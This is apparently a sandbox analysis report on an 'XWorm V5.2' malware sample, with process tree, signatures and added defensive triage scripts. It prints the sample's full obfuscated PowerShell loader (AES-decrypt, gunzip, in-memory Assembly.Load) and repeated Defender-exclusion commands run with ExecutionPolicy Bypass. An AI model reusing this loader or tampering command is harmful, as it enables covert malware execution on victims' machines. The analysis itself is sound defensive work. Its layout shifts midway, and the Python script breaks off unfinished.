Analysis
max time kernel: 359s
max time network: 360s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 05-09-2024 00:10
Static task: static1
Behavioral task: behavioral1
Sample: XWorm V5.2.exe
Resource: win7-20240704-en
General
Target: XWorm V5.2.exe
Size: 18.2MB
MD5: bdc4539e8060d4db24a69db716a1cec0
SHA1: 71c2485bf1684e73f16a213568efcaa2cb88ce6f
SHA256: c39cc9aaa0311fd1f6d981e995b608b0d36e464aea09896bd17b41bbd3fc1fe6
SHA512: b2411923cf5c2e4f96682f73234c409eca38b1712413ec946b1d652a4ddc266376eebe02fd6878dc3fc379eff1307f09407bc06db576c462ded08a839087eb4f
SSDEEP: 393216:s+gzSUAx9phaAUnQeGUPG/uVeZ/K2B1CkcDUDLHK18as0mcvow+Ax:1CwUAQQLIG/5//CFU/qO0T
Malware Config
Signatures

Command and Scripting Interpreter: PowerShell (1 TTP, 11 IoCs)
Runs PowerShell to modify Windows Defender settings by adding exclusions for file extensions, paths, or processes. In this run every hit is the same command, Add-MpPreference -ExclusionPath pointing at the dropped C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat (see the process tree), so the loader script is excluded from Defender scanning.
Processes (all powershell.exe), by PID: 2040, 2764, 1628, 2508, 1728, 2328, 948, 2092, 2880, 536, 2364
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (22 IoCs)
Processes (all powershell.exe), by PID: 2880, 536, 1984, 2928, 1728, 1280, 2328, 868, 948, 1704, 2040, 2400, 2364, 2692, 2092, 1660, 2764, 2464, 1628, 2472, 2508, 2592
Suspicious use of AdjustPrivilegeToken (22 IoCs)
Each of the following powershell.exe processes enabled SeDebugPrivilege in its own token (Token: SeDebugPrivilege), by PID: 2880, 536, 1984, 2928, 1728, 1280, 2328, 868, 948, 1704, 2040, 2400, 2364, 2692, 2092, 1660, 2764, 2464, 1628, 2472, 2508, 2592
Suspicious use of WriteProcessMemory (64 IoCs)
Every entry is a parent writing into the memory of a child it had just spawned. The sandbox recorded three writes per spawn, so the 64 entries are listed here as parent -> child (x3); the final pair shows a single write because the listing is capped at 64 entries.
2820 XWorm V5.2.exe -> 2596 XWorm V5.2.exe (x3)
2820 XWorm V5.2.exe -> 2880 powershell.exe (x3)
2820 XWorm V5.2.exe -> 2664 cmd.exe (x3)
2596 XWorm V5.2.exe -> 2604 XWorm V5.2.exe (x3)
2596 XWorm V5.2.exe -> 536 powershell.exe (x3)
2664 cmd.exe -> 2292 cmd.exe (x3)
2664 cmd.exe -> 1984 powershell.exe (x3)
2596 XWorm V5.2.exe -> 2112 cmd.exe (x3)
2112 cmd.exe -> 2900 cmd.exe (x3)
2112 cmd.exe -> 2928 powershell.exe (x3)
2604 XWorm V5.2.exe -> 1120 XWorm V5.2.exe (x3)
2604 XWorm V5.2.exe -> 1728 powershell.exe (x3)
2604 XWorm V5.2.exe -> 2056 cmd.exe (x3)
2056 cmd.exe -> 1632 cmd.exe (x3)
2056 cmd.exe -> 1280 powershell.exe (x3)
1120 XWorm V5.2.exe -> 2488 XWorm V5.2.exe (x3)
1120 XWorm V5.2.exe -> 2328 powershell.exe (x3)
1120 XWorm V5.2.exe -> 1288 cmd.exe (x3)
1288 cmd.exe -> 1716 cmd.exe (x3)
1288 cmd.exe -> 868 powershell.exe (x3)
2488 XWorm V5.2.exe -> 1412 XWorm V5.2.exe (x3)
2488 XWorm V5.2.exe -> 948 powershell.exe (x1, listing capped at 64)
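The Defender-exclusion and script-block behaviour flagged above, turned into a host triage script. This is an added example, not part of the sandbox report and not code from the sample: the indicator strings it searches for are copied from the loader command line in the process tree below, while the user-writable path pattern, the "at least two strings" match rule and the -Remove switch are this script's own assumptions. It needs the Defender PowerShell module (absent on the Windows 7 image the sample ran in) and Script Block Logging turned on for the 4104 search to return anything.

```powershell
# Added example: host triage for the behaviour this report flags. Not part of the report or the sample.
# Indicator strings are copied from the loader command line in the process tree; the user-writable
# path pattern, the "at least two strings" rule and the -Remove switch are this script's assumptions.
# Requires the Defender module (Windows 8.1 / Server 2012 R2 and later) and Script Block Logging.
param([switch]$Remove)

$LoaderStrings = @(
    'gnirtS46esaBmorF',               # 'FromBase64String' reversed
    'txeTllAdaeR',                    # 'ReadAllText' reversed
    'daoL',                           # 'Load' reversed (too short on its own, hence the 2-string rule)
    'sgymnEOEMpmtiRUpGEhO',           # marker prefix of the payload line in XWorm V5.2.bat
    'Add-MpPreference -ExclusionPath' # the Defender tampering command itself
)
# Locations an unprivileged user can write to; an exclusion here protects a dropper, not software (assumption)
$UserWritable = '(?i)\\Users\\[^\\]+\\(AppData|Downloads|Desktop)\\|\\ProgramData\\|\\Windows\\Temp\\'

function Get-SuspiciousExclusion {
    # Current Defender exclusions whose path or process lives in a user-writable location
    $pref = Get-MpPreference
    foreach ($p in @($pref.ExclusionPath)) {
        if ($p -and $p -match $UserWritable) { [pscustomobject]@{ Kind = 'Path'; Value = $p } }
    }
    foreach ($p in @($pref.ExclusionProcess)) {
        if ($p -and $p -match $UserWritable) { [pscustomobject]@{ Kind = 'Process'; Value = $p } }
    }
}

function Find-LoaderScriptBlock {
    # Event 4104 keeps the script text in Properties[2]; long scripts are split over several events,
    # so each event is scored on its own and two distinct loader strings are required for a hit
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $text = [string]$_.Properties[2].Value
        $hits = @($LoaderStrings | Where-Object { $text.Contains($_) })
        if ($hits.Count -ge 2) {
            [pscustomobject]@{ Time = $_.TimeCreated; ProcessId = $_.ProcessId; Matched = ($hits -join ', ') }
        }
    }
}

$bad = @(Get-SuspiciousExclusion)
"Defender exclusions in user-writable locations: $($bad.Count)"
$bad | ForEach-Object { '  {0,-7} {1}' -f $_.Kind, $_.Value }
if ($Remove) {
    # Drop the exclusion first so the dropped file is scanned again; quarantine or delete it afterwards
    $paths = @($bad | Where-Object { $_.Kind -eq 'Path' }    | ForEach-Object { $_.Value })
    $procs = @($bad | Where-Object { $_.Kind -eq 'Process' } | ForEach-Object { $_.Value })
    if ($paths) { Remove-MpPreference -ExclusionPath $paths }
    if ($procs) { Remove-MpPreference -ExclusionProcess $procs }
}
'Script-block log entries that look like the loader:'
Find-LoaderScriptBlock | Sort-Object Time | Format-Table -AutoSize
```

Run it elevated, since Get-MpPreference shows exclusions only to administrators; the process IDs it prints can be matched against the powershell.exe PIDs in the signatures above when the log comes from the same host.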
Processes
Process tree as recorded by the sandbox. [n] is the nesting depth; an entry's parent is the nearest entry above it with depth n-1, and the signatures a process triggered are listed under it. Levels 1 to 12 are the sample re-launching its own image from the same path; each level spawns the next copy plus, as the entries further down show, a powershell.exe that adds a Defender exclusion and a cmd.exe that runs the dropped XWorm V5.2.bat.

[1] PID 2820  C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
    - Suspicious use of WriteProcessMemory
[2] PID 2596  C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
    - Suspicious use of WriteProcessMemory
[3] PID 2604  C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
    - Suspicious use of WriteProcessMemory
[4] PID 1120  C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
    - Suspicious use of WriteProcessMemory
[5] PID 2488  C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
    - Suspicious use of WriteProcessMemory
[6] PID 1412  C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
[7] PID 2940  C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
[8] PID 2276  C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
[9] PID 2284  C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
[10] PID 1228  C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
[11] PID 1032  C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
[12] PID 328  C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
[12] PID 2508  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[12] PID 2760  C:\Windows\system32\cmd.exe
    command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
[13] PID 2780  C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /S /D /c" echo <loader script> "
    The echoed loader script is reproduced below with line breaks added for readability; the text is otherwise unchanged, and every cmd.exe /S /D /c instance in this tree echoes the identical script:

      function decrypt_function($param_var){
        $aes_var=[System.Security.Cryptography.Aes]::Create();
        $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;
        $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;
        $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs=');
        $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ==');
        $decryptor_var=$aes_var.CreateDecryptor();
        $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length);
        $decryptor_var.Dispose(); $aes_var.Dispose();
        $return_var;
      }
      function decompress_function($param_var){
        $gScxN=New-Object System.IO.MemoryStream(,$param_var);
        $drTXw=New-Object System.IO.MemoryStream;
        $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress);
        $JmztZ.CopyTo($drTXw);
        $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose();
        $drTXw.ToArray();
      }
      function execute_function($param_var,$param2_var){
        $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);
        $tsXTL=$BTSMq.EntryPoint;
        $tsXTL.Invoke($null, $param2_var);
      }
      $sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';
      $host.UI.RawUI.WindowTitle = $sQwMN;
      $CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);
      foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}
      $payloads_var=[string[]]$hWNDm.Split('\');
      $payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));
      $payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));
      execute_function $payload1_var $null;
      execute_function $payload2_var (,[string[]] (''));

    What the script does: the reversed string literals resolve to [Convert]::FromBase64String, [System.Reflection.Assembly]::Load and [System.IO.File]::ReadAllText, a cheap way to keep those method names out of the command line. It reads the .bat that launched it, takes the first line beginning with the 20-character marker sgymnEOEMpmtiRUpGEhO, splits the remainder on '\', undoes a custom alphabet ('#' stands for '/', '@' for 'A'), base64-decodes each blob, decrypts it with AES-CBC/PKCS7 under a hard-coded 32-byte key and 16-byte IV (AES-256), gunzips the result and calls Assembly.Load on the bytes, invoking each assembly's entry point inside this powershell.exe: the first with no arguments, the second with a single empty string. Nothing is written to disk, which is why the Defender exclusion targets the .bat rather than a dropped executable.
[13] PID 2592  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (no arguments; the script echoed by PID 2780 is piped into it)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[11] PID 1628  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[11] PID 1532  C:\Windows\system32\cmd.exe
    command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
[12] PID 2388  C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /S /D /c" echo <loader script> " (same script as PID 2780)
[12] PID 2472  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (no arguments; the script echoed by PID 2388 is piped into it)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

[10] PID 2764  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[10] PID 2460  C:\Windows\system32\cmd.exe
    command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
[11] PID 1952  C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /S /D /c" echo <loader script> " (same script as PID 2780)
[11] PID 2464  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (no arguments; the script echoed by PID 1952 is piped into it)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

[9] PID 2092  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[9] PID 1804  C:\Windows\system32\cmd.exe
    command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
[10] PID 2340  C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /S /D /c" echo <loader script> " (same script as PID 2780)
[10] PID 1660  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (no arguments; the script echoed by PID 2340 is piped into it)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

[8] PID 2364  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[8] PID 2912  C:\Windows\system32\cmd.exe
    command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
[9] PID 2744  C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /S /D /c" echo <loader script> " (same script as PID 2780)
[9] PID 2692  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (no arguments; the script echoed by PID 2744 is piped into it)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

[7] PID 2040  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[7] PID 1828  C:\Windows\system32\cmd.exe
    command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
[8] PID 2804  C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /S /D /c" echo <loader script> " (same script as PID 2780)
[8] PID 2400  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (no arguments; the script echoed by PID 2804 is piped into it)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[6] PID 948  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[6] PID 1060  C:\Windows\system32\cmd.exe
    command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
[7] PID 1712  C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /S /D /c" echo <loader script> " (same script as PID 2780)
[7] PID 1704  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (no arguments; the script echoed by PID 1712 is piped into it)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

[5] PID 2328  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[5] PID 1288  C:\Windows\system32\cmd.exe
    command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
    - Suspicious use of WriteProcessMemory
[6] PID 1716  C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /S /D /c" echo <loader script> " (same script as PID 2780)
[6] PID 868  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (no arguments; the script echoed by PID 1716 is piped into it)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

[4] PID 1728  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[4] PID 2056  C:\Windows\system32\cmd.exe
    command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
    - Suspicious use of WriteProcessMemory
[5] PID 1632  C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /S /D /c" echo <loader script> " (same script as PID 2780)
[5] PID 1280  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (no arguments; the script echoed by PID 1632 is piped into it)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

[3] PID 536  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[3] PID 2112  C:\Windows\system32\cmd.exe
    command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
    - Suspicious use of WriteProcessMemory
[4] PID 2900  C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /S /D /c" echo <loader script> " (same script as PID 2780)
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:2292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
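The three cmd.exe command lines above are the same launcher: the .bat file reads itself, finds the line starting with the 20-character marker 'sgymnEOEMpmtiRUpGEhO', splits the remainder on '\', undoes a custom base64 alphabet ('#' stands for '/', '@' for 'A'), AES-256-CBC-decrypts each blob with a key and IV hardcoded in the script, gunzips the result and hands the bytes to Assembly.Load, invoking each assembly's EntryPoint in the powershell.exe process. Method names such as FromBase64String, Load and ReadAllText are hidden with PowerShell's index-reversal trick ('gnirtS46esaBmorF'[-1..-16] -join ''). Because the key and IV travel with the launcher, both payloads can be recovered offline without executing anything. The Python below is an added example written for this report, not the sample's code and not part of the sandbox output: it de-obfuscates the reversed strings, flags the launcher indicators seen in these command lines (including the Add-MpPreference -ExclusionPath call run with -ExecutionPolicy Bypass), and re-implements the decode chain. Marker, alphabet, key and IV are copied from the command lines above; SAMPLE_BAT is constructed test data, and the AES step needs the third-party cryptography package. Recovered payloads should be hashed and compared against the dropped-file hashes under Downloads, never run.

```python
"""Offline triage of the XWorm V5.2.bat launcher from this report (added example)."""
import base64
import gzip
import hashlib
import re
import sys
from pathlib import Path

MARKER = "sgymnEOEMpmtiRUpGEhO"  # payload line prefix, loader uses Substring(20)
KEY_B64 = "Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs="  # AES-256 key hardcoded in loader
IV_B64 = "yPdScja9U8RjkyeOpTlzgQ=="  # 16-byte CBC IV hardcoded in loader

# 'gnirtS46esaBmorF'[-1..-16] -join ''  ==>  'FromBase64String'
_REVERSED = re.compile(r"'([^']*)'\[-1\.\.-(\d+)\]\s*-join\s*''")


def deobfuscate_reversed_strings(ps_code: str) -> str:
    """Undo PowerShell's index-reversal trick so method names become readable."""
    def unreverse(m):
        s, n = m.group(1), int(m.group(2))
        # indices past the start of the string yield $null in PowerShell, which joins as ''
        return "'" + "".join(s[-i] for i in range(1, n + 1) if i <= len(s)) + "'"
    return _REVERSED.sub(unreverse, ps_code)


def loader_indicators(cmdline: str) -> list[str]:
    """String-level indicators for this launcher family, usable as triage/detection logic."""
    hits = []
    if _REVERSED.search(cmdline):
        hits.append("reversed-string method names")
    if "[System.Reflection.Assembly]::('Load')" in deobfuscate_reversed_strings(cmdline):
        hits.append("in-memory Assembly.Load")
    if re.search(r"Add-MpPreference\s+-Exclusion", cmdline, re.I):
        hits.append("Defender exclusion added")
    if re.search(r"-ExecutionPolicy\s+Bypass", cmdline, re.I):
        hits.append("ExecutionPolicy Bypass")
    return hits


def decode_blob(blob: str) -> bytes:
    """Reverse the custom alphabet ('#' -> '/', '@' -> 'A') and base64-decode."""
    return base64.b64decode(blob.replace("#", "/").replace("@", "A"))


def extract_ciphertexts(bat_text: str, marker: str = MARKER) -> list[bytes]:
    """Locate the marker line and return the raw AES ciphertexts it carries."""
    for line in bat_text.splitlines():
        if line.startswith(marker):
            blobs = line[len(marker):].split("\\")
            break
    else:
        raise ValueError("payload marker line not found")
    cts = [decode_blob(b) for b in blobs]
    for i, ct in enumerate(cts):
        if len(ct) % 16:  # CBC input must be block aligned; catches a truncated blob early
            raise ValueError(f"blob {i}: {len(ct)} bytes is not a multiple of 16")
    return cts


def load_key_iv(key_b64: str = KEY_B64, iv_b64: str = IV_B64) -> tuple[bytes, bytes]:
    key, iv = base64.b64decode(key_b64), base64.b64decode(iv_b64)
    if len(key) not in (16, 24, 32) or len(iv) != 16:
        raise ValueError("key/IV lengths do not fit AES-CBC")
    return key, iv


def decrypt_and_decompress(ct: bytes, key: bytes, iv: bytes) -> bytes:
    """AES-CBC decrypt, strip PKCS7, gunzip: the loader's decrypt/decompress pair."""
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    except ImportError as e:  # third-party dependency: pip install cryptography
        raise RuntimeError("the 'cryptography' package is required for the AES step") from e
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = dec.update(ct) + dec.finalize()
    pad = padded[-1]
    if not 1 <= pad <= 16 or padded[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS7 padding: wrong key/IV or corrupted blob")
    return gzip.decompress(padded[:-pad])


# Constructed sample: a marker line carrying two blobs (32 zero bytes, then 16 0xFF bytes)
SAMPLE_BAT = "@echo off\r\nrem launcher stub\r\n" + MARKER + "@" * 43 + "=" + "\\" + "#" * 21 + "w==\r\n"

if __name__ == "__main__":
    print(loader_indicators("powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'x.bat'"))
    for i, ct in enumerate(extract_ciphertexts(SAMPLE_BAT)):
        print(f"sample blob {i}: {len(ct)} ciphertext bytes")
    if len(sys.argv) > 1:  # real use: python triage.py "XWorm V5.2.bat"
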